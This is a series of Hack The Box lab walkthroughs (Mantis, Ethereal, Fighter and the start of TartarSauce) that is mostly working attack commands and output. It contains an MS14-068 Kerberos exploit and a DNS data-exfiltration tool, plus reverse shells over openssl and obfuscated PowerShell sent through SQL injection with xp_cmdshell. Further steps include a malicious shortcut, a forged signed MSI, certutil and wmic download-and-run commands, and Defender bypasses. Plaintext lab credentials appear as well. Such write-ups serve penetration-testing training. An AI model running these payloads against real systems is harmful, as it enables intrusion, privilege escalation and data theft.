Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

goldenPac.py below uses Kerberos, which needs the domain and DC host names to resolve, so we added 10.10.10.52 to our local hosts file as htb.local and mantis.htb.local, the names found through nmap.

Then we installed Impacket from GitHub with the command below.

git clone https://github.com/CoreSecurity/impacket.git

Impacket’s goldenPac.py exploits MS14-068 (CVE-2014-6324, the Kerberos PAC signature validation flaw in unpatched domain controllers): with James’s valid domain credentials it obtains a ticket carrying a forged PAC that claims Domain Admins membership, then uses it to run a psexec-style service on the DC as SYSTEM. Execute the command below to access the victim’s terminal:

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567

Author: Jacco Straathof

HTB – Ethereal

Today we are going to solve another CTF challenge, “Ethereal”. It is a retired vulnerable lab presented by Hack the Box to let pentesters practise online according to their experience level; HTB has a collection of vulnerable labs as challenges, from beginner to expert.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are available online they have static IPs. The IP of Ethereal is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

1. Anonymous FTP login is allowed, and the server holds FDISK.zip. Switch the transfer mode to binary before downloading, otherwise the archive arrives corrupted. As nmap already noted, passive mode advertises an internal address (172.16.249.135), so the transfer has to use active mode:

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106
Ftp server

2. Unzipping FDISK.zip yields an image file; file identifies it as a FAT disk image. Mount it with mount -t vfat /root/FDISK /mnt/htbdisk and extract the two files pbox.dat and pbox.exe. Running pbox.exe in a Windows XP VM fails: it is a 16-bit application and cannot be run directly.

Pbox.exe

3. Emulators for 16-bit programs are easy to find; DOSBox is the best-known one (it runs many old games such as Prince of Persia and tank wars). On the first attempt pbox simply hangs.

4. This looks like a version-compatibility issue. DOSBox can be installed in Kali (apt-get install dosbox), but because the program uses DOS protected mode it may report an error like “no DPMI - Get csdpmi*b.zip”. A solution is described at: https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html The core of the fix is to download CWSDPMI.EXE and drop it into the directory with pbox.exe, after which pbox.exe runs normally.

5. The password asked for is “password”. Inside is a database; clicking the table entries shows their contents, from which a whole list of user names and passwords can be exported. The valid combination is:

user: alan
password: !C414m17y57r1k3s4g41n!

Pbox database

6. The obtained credentials log us in to the site on port 8080 (HTTP basic auth, realm ethereal.htb). It is a “Test Connection” page with a “Ping Address” field, which immediately suggests command injection.

8080 port login

7. The next problem is how to see the output, since the page itself does not echo it. On Linux one would smuggle data out with ping -p, but Windows ping has no -p option, so the only usable tool is nslookup: the command output is turned into DNS query names by a cmd for /f loop with the tokens parameter, and our own DNS listener receives them. For example, to see the second column of netstat -ano (all local IPs and ports), the value entered in the web form is (10.10.8.20 being the attacker’s VPN address; substitute your own tun0 IP):

127.0.0.1 | for /f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

(The for /f loop body is explained in https://www.youtube.com/watch?v=jMS6LkMdAHI.) Note that tokens can be combined: to see columns 1 to 6 of the result, use tokens=1,2,3,4,5,6 with the matching placeholders %a.%b.%c.%d.%e.%f, for example:

127.0.0.1 | for /f "tokens=1,2,3,4,5,6" %a in ('type c:\xxxxx.txt') do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8

Once the injection runs, start tcpdump or Wireshark with a dns filter to see the echoed output. (Below: tasklist output captured this way. nslookup performs two queries per name, so every result appears twice.)

Wireshark capture results

8. Next, enumerate the firewall rules. netsh advfirewall firewall show rule name=all lists the Windows firewall rules, but it cannot be run as-is through the injection point (piping its output into nslookup always crashes the web page), so the output must be written to a file and read back with type. That needs a writable path. Usually c:\users\public is the least-privileged location, but writing there directly fails; enumerating directory permissions with icacls shows that the current user, alan, can write to C:\users\public\desktop\Shortcuts\. The firewall configuration read back this way shows that only TCP ports 73 and 136 are allowed through.

Enumeration permissions:

Instead of piping netsh to nslookup, write only the names of the Allow rules to a file:

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This creates firewall.rulename.allow in a subfolder of public that Ethereal\Alan has write access to. Now we read the file with the method above and display the rule names, one DNS query per line:

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

result:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
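The two halves of the trick above, the raw-token queries and their reassembly on the attacking side, as an added Python example that is not part of the original write-up. parse_raw_tokens() turns Responder's "Requested name" lines (the sample below is copied from the output above) back into text; encode_hex() and decode_hex() go beyond the write-up with a hex-encoded, sequence-numbered variant that survives characters such as the ':' lost above and respects the 63-character label and 253-character name limits. The suffix domain and the log format are assumptions; producing hex on the target side (certutil -encodehex is one starting point) is left to the cmd one-liner.

```python
import re

# Added example (not from the write-up): attacker-side decoder for the nslookup exfil trick.
# Responder prints one line per DNS query it answers; the exfiltrated data rides in the name.
QUERY_RE = re.compile(r"Requested name:\s*(\S+)")

# Assumption: any suffix works when the victim is told to resolve via our IP directly
# (nslookup <name> 10.10.14.20), as the write-up does; it just marks our queries.
SUFFIX = "x.attacker.test"


def parse_raw_tokens(log_text: str) -> list:
    """Recover lines from queries built the way the write-up builds them: tokens joined by dots.

    Only hostname-legal characters survive this path, so the ':' in 'Rule Name:' is gone by
    the time Responder logs the query, and empty tokens show up as leading or doubled dots.
    """
    lines = []
    for match in QUERY_RE.finditer(log_text):
        line = " ".join(part for part in match.group(1).split(".") if part)
        if line and (not lines or lines[-1] != line):  # nslookup repeats each name; drop the echo
            lines.append(line)
    return lines


def encode_hex(data: bytes, suffix: str = SUFFIX, label_len: int = 60, labels_per_query: int = 3) -> list:
    """Hex-encode arbitrary bytes into DNS names of the form <seq>.<hex>.<hex>.<hex>.<suffix>.

    Hex only uses [0-9a-f], so every byte survives; labels stay under 63 characters and the
    whole name under 253, and the sequence number lets the decoder reorder and deduplicate.
    """
    hexed = data.hex()
    per_query = label_len * labels_per_query
    names = []
    for seq, start in enumerate(range(0, len(hexed), per_query)):
        chunk = hexed[start:start + per_query]
        labels = [chunk[i:i + label_len] for i in range(0, len(chunk), label_len)]
        names.append(".".join([str(seq)] + labels + [suffix]))
    return names


def decode_hex(log_text: str, suffix: str = SUFFIX) -> bytes:
    """Rebuild the bytes from a Responder or tcpdump text log containing encode_hex() names."""
    chunks = {}
    for match in QUERY_RE.finditer(log_text):
        name = match.group(1).rstrip(".")
        if not name.endswith("." + suffix):
            continue  # unrelated query, e.g. one in the raw-token style above
        labels = name[: -len(suffix) - 1].split(".")
        chunks[int(labels[0])] = "".join(labels[1:])  # repeated queries overwrite with the same value
    return bytes.fromhex("".join(chunks[seq] for seq in sorted(chunks)))


# Constructed sample: Responder lines as shown above, including the repeat nslookup causes.
SAMPLE_LOG = """\
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
"""

if __name__ == "__main__":
    for line in parse_raw_tokens(SAMPLE_LOG):
        print(line)
    names = encode_hex(b"Rule Name: Allow TCP Ports 73 136\r\n")
    fake_log = "\n".join(f"Requested name: {n}" for n in names)
    print(decode_hex(fake_log))
```

Run it against a saved Responder log or a tcpdump -l 'udp port 53' text dump; anything that is not a "Requested name" line is ignored, so the two styles can share one capture.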

Searching the system further with dir, we eventually find OpenSSL v1.1.0 installed under C:\Program Files (x86); we will use it to get a shell.
A command that gives a more complete dir listing (delims= keeps each file name, spaces included, as a single token):

127.0.0.1 & cmd.exe /V /C "for /f "delims=" %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"

10. I was not familiar with the client/server mode of openssl, so I first built a lab locally. The official site https://www.openssl.org documents the command parameters and offers the source code, but no installer; installers for every version can be downloaded from http://slproweb.com/products/Win32OpenSSL.html and install with all the defaults (Next, Next, Finish).

Openssl for windows

11. On the Kali side, set up the openssl server first. It needs a private key and a certificate, so run:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
It then prompts for certificate fields (country code, e-mail address and so on); fill in anything, the content is not checked.
For the command parameters, see the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0/com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

Generate certificate

12. Using openssl's s_client to connect to the server, the local test shows that openssl behaves like nc without the -e option: whatever you type is displayed on the other side, but nothing gets executed. The pipe character solves that: redirect one openssl connection into cmd.exe, and pipe the output of cmd.exe into a second openssl connection. In short:
openssl s_client 1 ---> input | cmd.exe | openssl s_client 2 ---> output
This is why the firewall has to allow two ports.
Translated to the web injection, the RCE command is:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
Against the real target, open two terminals at the same time, one openssl server on port 73 and one on port 136:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Type a command in the port-73 terminal and press Enter, then submit the RCE command above on the web page to push the input into the pipeline; the result shows up in the port-136 terminal.
13. With a low-privileged shell, the next hint is in c:\users\alan\Desktop: it tells us there is a Visual Studio shortcut on the Public Desktop and invites us to use it.
Lead file

14. Create a malicious .lnk shortcut with PowerShell. The Arguments field carries the same openssl pipeline as in step 12: s_client on port 73 feeding cmd.exe, whose output feeds s_client on port 136.

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco> $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco> $SC


FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\Users\jacco> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
PS C:\Users\jacco> $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The resulting shortcut is shown below; the command that will be executed is visible in the Target field of its properties.

15. Upload the malicious shortcut and overwrite c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Uploading a .lnk file directly may fail, so rename it to a .txt suffix for the upload. The upload also goes through the openssl pipe, but the existing shell connection has to be closed first.

Kali: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
Web: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (the suffix is changed back to .lnk once the upload has succeeded)
Re-establish the shell connection, then in the shell run:
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy "c:\users\public\desktop\shortcuts\out.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk"

16. Soon a new shell arrives. This one no longer depends on the web page: type in the port-73 terminal and read the results in the port-136 terminal, which is much smoother. user.txt is on the desktop of the jorge user.
User.txt

17. Searching on, there are two suspicious folders on the D drive: Certs, which holds certificate files, and DEV, which holds another hint file. The hint is easy to read: a malicious MSI installer dropped in this path will be picked up by the rupal user, and combined with the certificate files this means the MSI probably has to be signed.

Lead file 2

18. Typing the certificate files gives binary garbage that cannot be copied, and we have no download channel yet, so use openssl's base64 encoder to print them as text:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk
Copy the base64 text to Kali and restore the files with base64 -d.

Obtain a certificate

19. Generate the MSI with the graphical EMCO MSI Package Builder: create a new project, open Custom Actions, right-click to add a new Pre/Post action, fill in the key parameters (the command to run) and build the MSI package. (The password is left blank.)

Malicious msi generation

20. Sign the MSI with the recovered CA certificate and key. This requires .NET Framework 4 and the Windows SDK, which can be downloaded at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https://www.microsoft.com/en-us/download/confirmation.aspx?id=8279
Once installed, signing takes three commands: makecert issues a new code-signing certificate chained to MyCA, pvk2pfx bundles it with its key into a PFX, and signtool signs the MSI with it:
makecert -n "CN=Ethereal" -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature is successful, you can see the following prompt:

Successful signature

21. Upload the signed MSI to d:\dev\msis\shell.msi, then close the two openssl connections on 73 and 136 and start listening on both again. After about a minute the rupal user's shell comes in; read root.txt from his Desktop:

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the MSI does not deploy, a second attempt needs a freshly generated and signed MSI: an MSI that has already been installed is registered with the system (it shows up under Add/Remove Programs in the control panel) and will not run again, and from this shell there is no way to uninstall the earlier one.

Author : Jacco Straathof

HTB – Fighter

Today we are going to solve another CTF challenge, "Fighter". It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

We don't find anything new on the web page, but looking further there are hints that subdomains exist which may give us more clues. We intercept the request in Burp, send it to Intruder and mark the subdomain part of the Host header as the position to brute force.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan on members.streetfighterclub.htb and find a directory called "old".

dirb http://members.streetfighterclub.htb/

We then look for pages inside that directory. As it is an IIS server we search for .asp files and find a page called "login.asp".

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the login page and find that it is vulnerable to SQL injection (the logintype parameter). We extract a username, password and e-mail, but are still unable to log in, so we turn the injection into command execution with stacked queries that enable xp_cmdshell. We followed this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We don't find anything useful on the target machine, so we try to upgrade our shell to Meterpreter, but no exe we drop will run: an endpoint control (Defender, as the Empire section below notes) blocks it. We found a reference through this link on how to bypass this: we use nps_payload to create an MSBuild XML file that carries our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by nps_payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

We still don't find anything to escalate our privileges. As this machine is Street Fighter themed, we google for Street Fighter exploits and find that Street Fighter V shipped a driver, Capcom.sys, with a privilege escalation vulnerability. It is installed as a service called Capcom, so we check whether it exists on the target machine.

sc query capcom

We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

Checking getuid shows that we have successfully obtained administrative rights.

We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them with IDA and find that the program XORs 9 into each character of the string IDA names aFmFeholH and compares the result with the entered password. The string is "Fm`fEhOl}h" (ten characters; the backtick is easy to lose when copying out of IDA).

So we write a small C program that XORs 9 into each character of "Fm`fEhOl}h".

We compile and run it and get the password "OdioLaFeta".
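The same decode as an added Python example, not the author's C program, using the encoded string that XORing "OdioLaFeta" with 9 actually produces, "Fm`fEhOl}h". recover_key() and brute_single_byte() are additions beyond the write-up: they show how to get the key from one known plaintext/ciphertext pair, or from a printability filter over all 256 keys when the constant is not obvious in the disassembly.

```python
import string

KEY = 0x09  # the constant the disassembly shows being XORed into each byte

# Added example (not the author's C program); the encoded string is XOR("OdioLaFeta", 9).
ENCODED = "Fm`fEhOl}h"


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR. XOR is its own inverse, so the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def decode_password(encoded: str, key: int = KEY) -> str:
    """What root.exe does before the comparison: XOR the stored string with the key."""
    return xor_bytes(encoded.encode("latin-1"), key).decode("latin-1")


def recover_key(encoded: str, known_plain: str):
    """Given one plaintext/ciphertext pair, c ^ p must give the same byte at every position.
    Returns that byte, or None if the lengths differ or the relation is not a single-byte XOR."""
    if len(encoded) != len(known_plain):
        return None
    keys = {ord(c) ^ ord(p) for c, p in zip(encoded, known_plain)}
    return keys.pop() if len(keys) == 1 else None


def brute_single_byte(encoded: str) -> list:
    """No key from the disassembly? Try all 256 and keep the candidates that decode to
    fully printable text (space allowed, other whitespace control characters not)."""
    raw = encoded.encode("latin-1")
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    return [(k, xor_bytes(raw, k).decode("latin-1"))
            for k in range(256) if set(xor_bytes(raw, k)) <= printable]


if __name__ == "__main__":
    print(decode_password(ENCODED))                 # OdioLaFeta
    print(recover_key(ENCODED, "OdioLaFeta"))       # 9
    candidates = dict(brute_single_byte(ENCODED))
    print(len(candidates), "printable candidates; key 9 gives", candidates[9])
```

The brute-force list is short for a string this size because every byte has to land in the printable range; scanning it by eye for something that looks like a word is usually faster than reading the XOR loop in the disassembler.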

When we provide the password to the root.exe we get our final flag.

With help of Empire

Bypassing Defender with the starfighter_xsl stager from Empire, by Luis Vacas.
For this we write a small Python script that makes the target fetch and run our .xsl through wmic, which gives us an Empire agent:

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
import requests

# Stacked-query injection through the logintype field: enable xp_cmdshell, run wmic with our
# remote .xsl (which becomes the Empire agent), then switch xp_cmdshell off again.
params = {
    "username": "admin",
    "password": "admin",
    "B1": "LogIn",
    "logintype": "1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;",
}

# The session cookie comes from a normal visit to the login page in the browser
resp = requests.post("http://members.streetfighterclub.htb/old/verify.asp", data=params, allow_redirects=False,
                     cookies={"ASPSESSIONIDCARRRDBA": "IFMBKKKDLPNKELDDENPKDKNB"})
print(resp.status_code)
Let's migrate the Empire agent to Metasploit with nps_payload: https://github.com/trustedsec/nps_payload (example of use)

cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge, "TartarSauce". It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
